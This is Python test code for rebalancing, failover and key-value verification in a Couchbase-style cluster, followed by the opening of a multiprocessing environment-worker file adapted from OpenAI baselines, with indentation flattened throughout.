active_items_match = stats["curr_items"] == items_inserted
if not active_items_match:
asserts.append(msg.format(stats["curr_items"], items_inserted, bucket.name))
if len(asserts) > 0:
for msg in asserts:
test.log.error(msg)
test.assertTrue(len(asserts) == 0, msg=asserts)
@staticmethod
def get_distribution(load_ratio):
distribution = {10: 0.2, 20: 0.5, 30: 0.25, 40: 0.05}
if load_ratio == 10:
distribution = {1024: 0.4, 2 * 1024: 0.5, 10 * 1024: 0.1}
elif load_ratio > 10:
distribution = {5 * 1024: 0.4, 10 * 1024: 0.5, 20 * 1024: 0.1}
return distribution
@staticmethod
def rebalance_in(servers, how_many):
return RebalanceHelper.rebalance_in(servers, how_many)
@staticmethod
def load_data_for_buckets(rest, load_ratio, distribution, rebalanced_servers, bucket_data, test):
buckets = rest.get_buckets()
for bucket in buckets:
inserted_count, rejected_count = \
MemcachedClientHelper.load_bucket(name=bucket.name,
servers=rebalanced_servers,
ram_load_ratio=load_ratio,
value_size_distribution=distribution,
number_of_threads=1,
write_only=True,
moxi=True)
test.log.info('inserted {0} keys'.format(inserted_count))
bucket_data[bucket.name]["items_inserted_count"] += inserted_count
@staticmethod
def threads_for_buckets(rest, load_ratio, distribution, rebalanced_servers, bucket_data, delete_ratio=0,
expiry_ratio=0):
buckets = rest.get_buckets()
for bucket in buckets:
threads = MemcachedClientHelper.create_threads(servers=rebalanced_servers,
name=bucket.name,
ram_load_ratio=load_ratio,
value_size_distribution=distribution,
number_of_threads=4,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio)
[t.start() for t in threads]
bucket_data[bucket.name]["threads"] = threads
return bucket_data
@staticmethod
def bucket_data_init(rest):
bucket_data = {}
buckets = rest.get_buckets()
for bucket in buckets:
bucket_data[bucket.name] = {}
bucket_data[bucket.name]['items_inserted_count'] = 0
bucket_data[bucket.name]['inserted_keys'] = []
bucket_data[bucket.name]['kv_store'] = None
bucket_data[bucket.name]['tasks'] = {}
return bucket_data
@staticmethod
def load_data(master, bucket, keys_count=-1, load_ratio=-1, delete_ratio=0, expiry_ratio=0, test=None):
log = logger.Logger.get_logger()
inserted_keys, rejected_keys = \
MemcachedClientHelper.load_bucket_and_return_the_keys(servers=[master],
name=bucket,
ram_load_ratio=load_ratio,
number_of_items=keys_count,
number_of_threads=2,
write_only=True,
delete_ratio=delete_ratio,
expiry_ratio=expiry_ratio,
moxi=True)
log.info("wait until data is completely persisted on the disk")
ready = RebalanceHelper.wait_for_stats_on_all(master, bucket, 'ep_queue_size', 0, timeout_in_seconds=120)
test.assertTrue(ready, "wait_for ep_queue_size == 0 failed")
ready = RebalanceHelper.wait_for_stats_on_all(master, bucket, 'ep_flusher_todo', 0, timeout_in_seconds=120)
test.assertTrue(ready, "wait_for ep_flusher_todo == 0 failed")
return inserted_keys
@staticmethod
def verify_data(master, inserted_keys, bucket, test):
log = logger.Logger.get_logger()
log.info("Verifying data")
ready = RebalanceHelper.wait_for_persistence(master, bucket)
BucketOperationHelper.keys_exist_or_assert_in_parallel(keys=inserted_keys, server=master, bucket_name=bucket,
test=test, concurrency=4)
@staticmethod
def tasks_for_buckets(rest, task_manager,
bucket_data,
new_doc_seed=None,
new_doc_count=-1,
DELETE_RATIO=0,
ACCESS_RATIO=0,
EXPIRY_RATIO=0,
ttl=5, data_perc=1):
# TODO: assert no value greater than 1
# TODO: assert sum of mutation ratios not greater than 1
for bucket in list(bucket_data.keys()):
get_task = None
del_task = None
exp_task = None
load_task = None
kv_store = bucket_data[bucket]['kv_store']
current_keys = kv_store.valid_items()
current_keys = current_keys[: int(len(current_keys) * data_perc)]
get_docs_count = int(len(current_keys) * ACCESS_RATIO)
del_docs_count = int(len(current_keys) * DELETE_RATIO)
exp_docs_count = int(len(current_keys) * EXPIRY_RATIO)
end_exp_index = del_docs_count + exp_docs_count
keys_to_get = current_keys[:get_docs_count]
keys_to_delete = current_keys[:del_docs_count]
keys_to_expire = current_keys[del_docs_count:end_exp_index]
# delete ratio of current keys
if len(keys_to_delete) > 0:
del_task = \
RebalanceTaskHelper.add_doc_del_task(task_manager, rest,
keys_to_delete,
bucket=bucket,
kv_store=kv_store)
# expire ratio of current keys
if len(keys_to_expire) > 0:
exp_task = \
RebalanceTaskHelper.add_doc_exp_task(task_manager, rest,
keys_to_expire,
bucket=bucket,
kv_store=kv_store)
# get ratio of current keys
if len(keys_to_get) > 0:
get_task = \
RebalanceTaskHelper.add_doc_get_task(task_manager, rest,
keys_to_get,
bucket=bucket)
# load more data
if new_doc_count == -1:
new_doc_count = len(current_keys)
load_task = \
RebalanceTaskHelper.add_doc_gen_task(task_manager, rest,
new_doc_count,
bucket=bucket,
seed=new_doc_seed,
kv_store=kv_store)
# update the users bucket_kv_info object
bucket_data[bucket]['tasks'] = {'get_task': get_task,
'del_task': del_task,
'exp_task': exp_task,
'load_task': load_task}
@staticmethod
def finish_all_bucket_tasks(rest, bucket_data):
buckets = rest.get_buckets()
[RebalanceBaseTest.finish_bucket_task(bucket_data[b.name]) for b in buckets]
@staticmethod
def finish_bucket_task(bucket_name_info):
log = logger.Logger().get_logger()
for k, _t in list(bucket_name_info['tasks'].items()):
if _t is not None:
log.info("Waiting for {0} task".format(k))
_t.result()
@staticmethod
def load_all_buckets_task(rest, task_manager, bucket_data, ram_load_ratio,
distribution=None, keys_count=-1, seed=None,
monitor=True):
buckets = rest.get_buckets()
tasks = None
for bucket in buckets:
kv_store = bucket_data[bucket.name].get('kv_store', None)
if kv_store is None:
kv_store = ClientKeyValueStore()
bucket_data[bucket.name]['kv_store'] = kv_store
tasks = RebalanceBaseTest.load_bucket_task_helper(rest, task_manager,
bucket.name, ram_load_ratio,
kv_store=kv_store,
keys_count=keys_count,
seed=seed,
monitor=monitor)
return tasks
@staticmethod
def load_bucket_task_helper(rest, task_manager, bucket, ram_load_ratio,
kv_store=None, distribution=None,
keys_count=-1, seed=None, monitor=True):
log = logger.Logger().get_logger()
tasks = []
if keys_count == -1:
# create document generators based on value_size_distrobution
doc_gen_configs = \
DocumentGenerator.get_doc_generators_by_load_ratio(rest,
bucket,
ram_load_ratio,
distribution)
for config in doc_gen_configs:
doc_gen = config['value']
how_many = config['how_many']
size = config['size']
seed = config['seed']
# start bucket loading task
msg = "start task to send {0} items with value of size : {1}"
log.info(msg.format(how_many, size))
doc_gen_task = RebalanceTaskHelper.add_doc_gen_task(task_manager, rest,
how_many, bucket,
kv_store=kv_store,
doc_generators=[doc_gen],
monitor=monitor)
tasks.append({'task': doc_gen_task, 'seed': seed})
else:
msg = "start task to send {0} items to bucket {1}"
log.info(msg.format(keys_count, bucket))
doc_gen_task = RebalanceTaskHelper.add_doc_gen_task(task_manager,
rest,
keys_count,
bucket,
kv_store,
seed=seed,
monitor=monitor)
tasks.append({'task': doc_gen_task, 'seed': seed})
return tasks
@staticmethod
def do_kv_verification(task_manager, rest, bucket_data):
log = logger.Logger().get_logger()
error_list = []
for bucket in bucket_data:
kv_store = bucket_data[bucket]['kv_store']
if kv_store is not None:
log.info("verifying kv store integrity")
errors = \
RebalanceTaskHelper.add_kv_integrity_helper(task_manager,
rest,
kv_store,
bucket)
error_list.append(errors)
log.info("verification errors: {0} ".format(error_list))
return error_list
@staticmethod
def do_kv_and_replica_verification(master, task_manager, bucket_data, replica, self, failed_over=False,):
rest = RestConnection(master)
RebalanceBaseTest.replication_verification(master, bucket_data, replica, self, failed_over=failed_over)
#verify only test without failed over cases
if not failed_over:
# run data integrity
error_list = RebalanceBaseTest.do_kv_verification(task_manager, rest, bucket_data)
[self.assertEqual(0, len(list(errors.items()))) for errors in error_list]
@staticmethod
def check_resident_ratio(self, master):
"""Check the memory stats- resident ratio from all the servers; expected range is either specified by the
user or default to 50% for both active and replica items.
Args:
self - self
master: master node.
Returns:
None.
Raises:
Error/Fail: If the resident ratio is below expected value ( default is 50)
"""
rest = RestConnection(master)
nodes = rest.node_statuses()
buckets = rest.get_buckets()
rebalance_stats = {}
for node in nodes:
for bucket in buckets:
_node = {"ip": node.ip, "port": node.port, "username": master.rest_username,
"password": master.rest_password}
mc_conn = MemcachedClientHelper.direct_client(_node, bucket.name)
stats = mc_conn.stats()
self.log.info(
"Bucket {0} node {1}:{2}\nhigh watermark: {3}, low watermark: {4}".format(bucket.name, node.ip,
node.port,
stats["ep_mem_high_wat"], stats["ep_mem_low_wat"]))
key = "{0}:{1}".format(node.ip, node.port)
rebalance_stats[key] = {}
rebalance_stats[key] = stats
active_items_ratio = int(rebalance_stats[key]["vb_active_perc_mem_resident"])
replica_items_ratio = int(rebalance_stats[key]["vb_replica_perc_mem_resident"])
self.log.info("active resident ratio is {0}".format(
active_items_ratio))
self.log.info("replica resident ratio is {0}".format(
replica_items_ratio))
if active_items_ratio < self.activeRatio:
self.fail(
"Very poor active resident ratio {0} for node {1}:{2} ".format(active_items_ratio, node.ip,
node.port))
if replica_items_ratio < self.replicaRatio:
self.fail(
"Very poor replica resident ratio {0}".format(replica_items_ratio, node.ip, node.port))
mc_conn.close()
class IncrementalRebalanceInTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, self.load_ratio,
keys_count=self.keys_count)
#if the data set is too big we will operate on only 10% of the data
#because parallel ops are too slow since num_locks=1 is used in the old kv store
data_perc = 1
#self.keys_count = self.keys_count // 10
for server in self.servers[1:]:
if self.keys_count >= 100000:
data_perc *= 0.1
self.log.info("we will operate only with 10% of data size {0} items".format(self.keys_count))
self.log.info("PARALLEL LOAD")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio, data_perc=data_perc)
self.log.info("INCREMENTAL REBALANCE IN")
# rebalance in a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[server],
[], do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("DONE LOAD AND REBALANCE")
# verification step
if self.do_verify:
self.log.info("VERIFICATION")
RebalanceBaseTest.do_kv_and_replica_verification(master,
self.task_manager,
bucket_data,
self.replica,
self)
else:
self.log.info("NO VERIFICATION")
def test_load(self):
self._common_test_body()
class IncrementalRebalanceWithMcsoda(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance, then remove each node
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
# start load, max_ops_per_second is the combined limit for all buckets
buckets = rest.get_buckets()
loaders = []
self.log.info("max-ops-per-second per bucket: {0}".format(self.max_ops_per_second // len(buckets)))
for bucket in buckets:
loader = {}
loader["mcsoda"] = LoadWithMcsoda(master, self.keys_count, prefix='', bucket=bucket.name,
password=bucket.saslPassword, protocol='membase-binary')
loader["mcsoda"].cfg["max-ops"] = 0
loader["mcsoda"].cfg["max-ops-per-sec"] = self.max_ops_per_second // len(buckets)
loader["mcsoda"].cfg["exit-after-creates"] = 0
loader["mcsoda"].cfg["min-value-size"] = self.min_item_size
loader["mcsoda"].cfg["json"] = 0
loader["mcsoda"].cfg["batch"] = 100
loader["thread"] = Thread(target=loader["mcsoda"].load_data, name='mcloader_' + bucket.name)
loader["thread"].daemon = True
loaders.append(loader)
for loader in loaders:
loader["thread"].start()
for iteration in range(self.repeat):
for server in self.servers[1:]:
self.log.info("iteration {0}: ".format(iteration))
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
rebalance_done = False
rebalance_try = 0
while not rebalance_done:
try:
ClusterOperationHelper.begin_rebalance_in(master, [server])
ClusterOperationHelper.end_rebalance(master)
rebalance_done = True
except AssertionError as e:
rebalance_try += 1
self.log.error(e)
time.sleep(5)
if rebalance_try > 5:
raise e
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("removing node {0} and rebalance afterwards".format(server.ip))
rebalance_done = False
rebalance_try = 0
while not rebalance_done:
try:
ClusterOperationHelper.begin_rebalance_out(master, [server])
ClusterOperationHelper.end_rebalance(master)
rebalance_done = True
except AssertionError as e:
rebalance_try += 1
self.log.error(e)
time.sleep(5)
if rebalance_try > 5:
raise e
# stop load
for loader in loaders:
loader["mcsoda"].load_stop()
for loader in loaders:
loader["thread"].join()
def test_load(self):
self._common_test_body()
class IncrementalRebalanceOut(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
cluster_size = self.input.param("cluster_size", len(self.servers))
howMany = self.input.param("howMany", cluster_size - 1)
if howMany >= cluster_size:
self.fail(
"Input error! howMany {0} rebalance-outs should be lesser than cluster_size {1}".format(howMany, \
cluster_size))
# add all servers
self.log.info("Rebalancing In with cluster size {0}".format(cluster_size))
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
self.servers[1:cluster_size],
[])
self.log.info("Initial Load with key-count {0}".format(self.keys_count))
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, ram_load_ratio=self.load_ratio,
keys_count=self.keys_count)
while howMany > 0:
if len(rest.node_statuses()) < 2:
break
if self.checkResidentRatio:
self.log.info("Getting the resident ratio stats before failover/rebalancing out the nodes")
RebalanceBaseTest.check_resident_ratio(self, master)
# Never pick master node - The modified function takes care of this one.
rebalanceOutNode = RebalanceHelper.pick_node(master)
self.log.info(
"Incrementally rebalancing out node {0}:{1}".format(rebalanceOutNode.ip, rebalanceOutNode.port))
# rebalance out a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[],
[rebalanceOutNode], do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("Completed Loading and Rebalacing out")
if self.checkResidentRatio:
self.log.info("Getting the resident ratio stats after rebalancing out the nodes")
RebalanceBaseTest.check_resident_ratio(self, master)
# verification step
if self.do_verify:
self.log.info("Verifying with KV store")
RebalanceBaseTest.do_kv_and_replica_verification(master, self.task_manager,
bucket_data, self.replica, self)
else:
self.log.info("No Verification with KV store")
howMany = howMany - 1
def test_load(self):
self._common_test_body()
class StopRebalanceAfterFailoverTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def stop_rebalance(self):
self._common_test_body()
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
ClusterOperationHelper.add_all_nodes_or_assert(master, self.servers, creds, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding nodes")
nodes = rest.node_statuses()
#dont rebalance out the current node
while len(nodes) > 1:
#pick a node that is not the master node
toBeEjectedNode = RebalanceHelper.pick_node(master)
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, [master], bucket_data, self)
self.log.info("current nodes : {0}".format([node.id for node in rest.node_statuses()]))
#let's start/step rebalance three times
self.log.info("removing node {0} and rebalance afterwards".format(toBeEjectedNode.id))
rest.fail_over(toBeEjectedNode.id)
self.log.info("failed over {0}".format(toBeEjectedNode.id))
time.sleep(10)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=[toBeEjectedNode.id])
expected_progress = 30
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "rebalance failed or did not reach {0}%".format(expected_progress))
stopped = rest.stop_rebalance()
self.assertTrue(stopped, msg="unable to stop rebalance")
time.sleep(20)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[toBeEjectedNode.id])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(toBeEjectedNode.id))
time.sleep(20)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self)
nodes = rest.node_statuses()
class IncrementalRebalanceWithParallelReadTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self, moxi=False):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
self.log.info("adding node {0}:{1} and rebalance afterwards".format(server.ip, server.port))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
for name in bucket_data:
inserted_keys, rejected_keys = \
MemcachedClientHelper.load_bucket_and_return_the_keys(servers=[self.servers[0]],
name=name,
ram_load_ratio=-1,
number_of_items=self.keys_count,
number_of_threads=1,
write_only=True)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
self.log.info("completed rebalancing in server {0}".format(server))
IncrementalRebalanceWithParallelReadTests._reader_thread(self, inserted_keys, bucket_data, moxi=moxi)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
break
@staticmethod
def _reader_thread(self, inserted_keys, bucket_data, moxi=False):
errors = []
rest = RestConnection(self.servers[0])
smartclient = None
for name in bucket_data:
for key in inserted_keys:
if moxi:
moxi = MemcachedClientHelper.proxy_client(self.servers[0], name)
else:
smartclient = VBucketAwareMemcached(rest, name)
try:
if moxi:
moxi.get(key)
else:
smartclient.memcached(key).get(key)
except Exception as ex:
errors.append({"error": ex, "key": key})
self.log.info(ex)
if not moxi:
smartclient.done()
smartclient = VBucketAwareMemcached(rest, name)
def test_10k_moxi(self):
self._common_test_body(moxi=True)
def test_10k_memcached(self):
self._common_test_body()
class FailoverRebalanceRepeatTests(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
#load data add one node , rebalance add another node rebalance
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
rebalanced_servers = [master]
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager, bucket_data, self.load_ratio,
keys_count=self.keys_count)
for name in bucket_data:
for thread in bucket_data[name]["threads"]:
bucket_data[name]["items_inserted_count"] += thread.inserted_keys_count()
for server in self.servers[1:]:
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
#do this 2 times , start rebalance , failover the node , remove the node and rebalance
for i in range(0, self.num_rebalance):
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, [master], bucket_data,
self)
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
rebalanced_servers.append(server)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
rest.fail_over(otpNode.id)
self.log.info("failed over {0}".format(otpNode.id))
time.sleep(10)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()],
ejectedNodes=[otpNode.id])
msg = "rebalance failed while removing failover nodes {0}".format(otpNode.id)
self.assertTrue(rest.monitorRebalance(), msg=msg)
#now verify the numbers again ?
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
#wait 6 minutes
time.sleep(6 * 60)
self.log.info("adding node {0} and rebalance afterwards".format(server.ip))
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster {1}"
self.assertTrue(otpNode, msg.format(server.ip, master.ip))
distribution = RebalanceBaseTest.get_distribution(self.load_ratio)
RebalanceBaseTest.load_data_for_buckets(rest, self.load_ratio, distribution, rebalanced_servers, bucket_data, self)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(server.ip))
rebalanced_servers.append(server)
RebalanceBaseTest.replication_verification(master, bucket_data, self.replica, self, True)
def test_load(self):
self._common_test_body()
class RebalanceInOutWithParallelLoad(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
self.log.info("INTIAL LOAD")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager, bucket_data, self.load_ratio,
keys_count=self.keys_count)
rebalance_out = False
for server in self.servers[1:]:
if rebalance_out:
# Pick a node to rebalance out, other than master
ejectedNodes = [RebalanceHelper.pick_node(master)]
else:
ejectedNodes = []
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
self.log.info("adding node {0}, removing node {1} and rebalance afterwards".format(server.ip,
[node.ip for node in ejectedNodes]))
self.log.info("START PARALLEL LOAD")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio)
self.log.info("INCREMENTAL REBALANCE IN/OUT")
# rebalance in/out a server
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[server],
ejectedNodes, do_stop=self.do_stop)
# wait for loading tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
# Make sure we have at least 3 nodes, for replica=2
if len(current_nodes) > 2:
rebalance_out = True
if self.do_verify:
self.log.info("VERIFICATION")
RebalanceBaseTest.do_kv_and_replica_verification(master,
self.task_manager,
bucket_data,
self.replica,
self)
else:
self.log.info("NO VERIFICATION")
def test_load(self):
self._common_test_body()
class RebalanceOutWithFailover(unittest.TestCase):
def setUp(self):
RebalanceBaseTest.common_setup(self)
def tearDown(self):
RebalanceBaseTest.common_tearDown(self)
def _common_test_body(self):
master = self.servers[0]
rest = RestConnection(master)
bucket_data = RebalanceBaseTest.bucket_data_init(rest)
# add all servers
self.log.info("Initially rebalancing in the nodes")
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
self.servers[1:],
[], monitor=True, do_stop=self.do_stop)
self.log.info("Initial loading of data")
RebalanceBaseTest.load_all_buckets_task(rest, self.task_manager,
bucket_data, self.load_ratio,
keys_count=self.keys_count)
nodes = rest.node_statuses()
for node in nodes[1:]:
            # Get the current cluster size; keep failing over nodes until current_cluster_size == replica + 1
current_cluster_len = len(rest.node_statuses())
if current_cluster_len < (self.replica + 1):
self.log.info(
"Replica count {0} is greater than the current cluster-size{1}, stopping failover test.".format(
self.replica, current_cluster_len))
else:
# Never pick master node
if node.ip != master.ip:
self.log.info("Starting Parallel Load ..")
RebalanceBaseTest.tasks_for_buckets(rest, self.task_manager, bucket_data,
DELETE_RATIO=self.delete_ratio,
ACCESS_RATIO=self.access_ratio, EXPIRY_RATIO=self.expiry_ratio)
# Pick a Node to failover
toBeEjectedNode = RebalanceHelper.pick_node(master)
self.log.info("Starting Failover and Rebalance Out for node {0}:{1}".format(toBeEjectedNode.ip,
toBeEjectedNode.port))
# rebalance Out
RebalanceTaskHelper.add_failover_task(self.task_manager,
[master],
[toBeEjectedNode], True)
self.log.info(
"Completed Failover for node {0}:{1}".format(toBeEjectedNode.ip, toBeEjectedNode.port))
# rebalance Out
RebalanceTaskHelper.add_rebalance_task(self.task_manager,
[master],
[],
[toBeEjectedNode], do_stop=self.do_stop, monitor=True)
# wait for all tasks to finish
RebalanceBaseTest.finish_all_bucket_tasks(rest, bucket_data)
self.log.info("Completed Load, Failover and Rebalance Out. ")
# verification step
if self.do_verify:
self.log.info("Verifying with KV-store")
RebalanceBaseTest.do_kv_and_replica_verification(master, self.task_manager,
bucket_data, self.replica, self, failed_over=True)
else:
self.log.info("No verification with KV-store specified")
# at least 2 nodes required per loop to rebalance out and verify replication
self.log.info("Completed Load and Rebalance-Out")
def test_load(self):
self._common_test_body()
class RebalanceTaskHelper():
@staticmethod
def add_rebalance_task(tm, servers, to_add, to_remove, monitor=True,
do_stop=False, progress=30):
_t = task.RebalanceTask(servers, to_add, to_remove, do_stop=do_stop,
progress=progress)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor=monitor)
@staticmethod
def add_failover_task(tm, servers, to_remove, monitor=False):
_t = task.FailOverTask(servers, to_remove)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def incremental_rebalance_in_tasks(tm, servers, to_add, delay=0):
return [RebalanceTaskHelper.schedule_task_helper(tm, _t, True, delay) for _t in
[task.RebalanceTask(servers, [new_server], []) for new_server in to_add]]
@staticmethod
def incremental_rebalance_out_tasks(tm, servers, to_remove):
return [RebalanceTaskHelper.schedule_task_helper(tm, _t, True) for _t in
[task.RebalanceTask(servers, [], [old_server]) for old_server in to_remove]]
@staticmethod
def add_doc_gen_task(tm, rest, count, bucket="default", kv_store=None, store_enabled=True,
kv_template=None, seed=None, sizes=None, expiration=None,
loop=False, monitor=False, doc_generators=None):
doc_generators = doc_generators or DocumentGenerator.get_doc_generators(count, kv_template, seed, sizes)
_t = task.LoadDocGeneratorTask(rest, doc_generators, bucket=bucket, kv_store=kv_store,
store_enabled=store_enabled, expiration=expiration, loop=loop)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def add_doc_del_task(tm, rest, keys, bucket="default", info=None,
kv_store=None, store_enabled=True,
monitor=False, delay=0):
_t = task.DocumentDeleteTask(rest, keys, bucket, info, kv_store, store_enabled)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_doc_exp_task(tm, rest, keys, bucket="default", info=None,
kv_store=None, store_enabled=True,
monitor=False, delay=0, expiration=5):
_t = task.DocumentExpireTask(rest, keys, bucket, info, kv_store,
store_enabled, expiration=expiration)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_doc_get_task(tm, rest, keys, bucket="default", info=None,
loop=False, monitor=False, delay=0):
_t = task.DocumentAccessTask(rest, keys, bucket=bucket, info=info, loop=loop)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor, delay)
@staticmethod
def add_kv_integrity_helper(tm, rest, kv_store, bucket="default", monitor=True):
_t = task.KVStoreIntegrityTask(rest, kv_store, bucket)
return RebalanceTaskHelper.schedule_task_helper(tm, _t, monitor)
@staticmethod
def schedule_task_helper(tm, task, monitor=False, delay=0):
tm.schedule(task, delay)
if monitor:
return task.result()
return task
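# Hedged usage sketch (not part of the original suite): `tm` is assumed to be the same
# task manager the RebalanceBaseTest classes use, and `servers` the server list from the
# test config; only helper names defined in this module are used, and the function is
# never called here.
def _example_incremental_rebalance(tm, servers):
    # rebalance the extra servers in one at a time, monitoring each rebalance
    RebalanceTaskHelper.incremental_rebalance_in_tasks(tm, [servers[0]], servers[1:])
    # then rebalance them back out again, one server per rebalance
    RebalanceTaskHelper.incremental_rebalance_out_tasks(tm, [servers[0]], servers[1:])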
|
multiprocessing_env.py
|
#This code is from openai baseline
#https://github.com/openai/baselines/tree/master/baselines/common/vec_env
import os
import sys
import numpy as np
from itertools import count
from multiprocessing import Process, Pipe
def worker(remote, parent_remote, env_fn_wrapper, render=0, shared=None):
parent_remote.close()
env = env_fn_wrapper.x()
try:
if render and env.spec.id.find('Bullet')>=0:
env.render(mode="human")
    except Exception:
        # rendering at startup is best-effort; ignore any failure here
        pass
if shared is not None and isinstance(shared, dict):
for k,v in shared.items():
setattr(env, k, v)
#~ while True:
for i in count(0):
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
if render and i%10==0:
env.render('human')
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env.reset_task(data)
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class VecEnv(object):
"""
An abstract asynchronous, vectorized environment.
"""
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
def step_wait(self):
"""
Wait for the step taken with step_async().
